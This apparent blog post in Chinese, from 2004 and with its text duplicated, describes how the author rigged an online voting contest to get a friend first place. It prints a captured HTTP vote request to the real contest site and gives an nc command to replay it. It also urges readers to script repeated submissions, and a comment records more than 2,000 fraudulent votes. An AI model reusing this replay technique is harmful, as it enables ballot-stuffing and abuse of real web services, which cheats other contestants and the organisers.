对现状产生的技术思想
恭喜Yang加入世界
2004/06/09 01:56 | by
桂电在线的飞翔鱼姐姐也参加了这个大赛 早上发给我叫我给她投票
我一看到这种系统就想多投 无奈竟然有提示不能重复投票 研究了一下发现这个破系统原来检测ip地址是否重复的脚本是页面的 那么如果我通过主机的80投票就可以绕过了
http://www.gl.gx.cn/bisai/blak4.htm
然后更换ip进行了一个投票 同时用sniffer抓了一个包 敏感内容如下
把以上文件放到硬盘 拷贝到一个叫1.txt的文件下
用nc.exe -vv ip 80<1.txt
提交就可以了
这样一来只要重复提交尽管 IPAddress=220%2E173%2E134%2E235 不变也可以的
写个小程序刷死它吧:D
这样我家姐姐轻松获得第一
关于此过程我也已经写成了文章 发到了邪恶八进制信息安全团队
http://www.eviloctal.com/forum/read.php?tid=2570&page=1&toread=1
我一看到这种系统就想多投 无奈竟然有提示不能重复投票 研究了一下发现这个破系统原来检测ip地址是否重复的脚本是页面的 那么如果我通过主机的80投票就可以绕过了
http://www.gl.gx.cn/bisai/blak4.htm
然后更换ip进行了一个投票 同时用sniffer抓了一个包 敏感内容如下
POST /bisai/vote/ivote.asp?voteID=205 HTTP/1.1
Accept: */*
Referer: http://www.gl.gx.cn/bisai/blak4.htm
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: www.gl.gx.cn
Content-Length: 29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPAddress=220%2E173%2E134%2E235; ASPSESSIONIDQSBABBBQ=PAFCFBGDNJJIIILPICEAEEPI
vote=n2&submit=+%CD%B6%C6%B1+HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Fri, 11 Jun 2004 06:09:17 GMT
Accept: */*
Referer: http://www.gl.gx.cn/bisai/blak4.htm
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: www.gl.gx.cn
Content-Length: 29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPAddress=220%2E173%2E134%2E235; ASPSESSIONIDQSBABBBQ=PAFCFBGDNJJIIILPICEAEEPI
vote=n2&submit=+%CD%B6%C6%B1+HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Fri, 11 Jun 2004 06:09:17 GMT
把以上文件放到硬盘 拷贝到一个叫1.txt的文件下
用nc.exe -vv ip 80<1.txt
提交就可以了
这样一来只要重复提交尽管 IPAddress=220%2E173%2E134%2E235 不变也可以的
写个小程序刷死它吧:D
这样我家姐姐轻松获得第一
关于此过程我也已经写成了文章 发到了邪恶八进制信息安全团队
http://www.eviloctal.com/forum/read.php?tid=2570&page=1&toread=1
a1pass 
2008/01/30 21:00
恩,页面脚本控制确实不能在根本上解决问题,竟然刷了2000多票,怎么也要1000秒吧,不容易~
冰血封情 回复于 2008/01/31 17:35
不知道,我就狂刷。:P
分页: 1/1 
1 
1
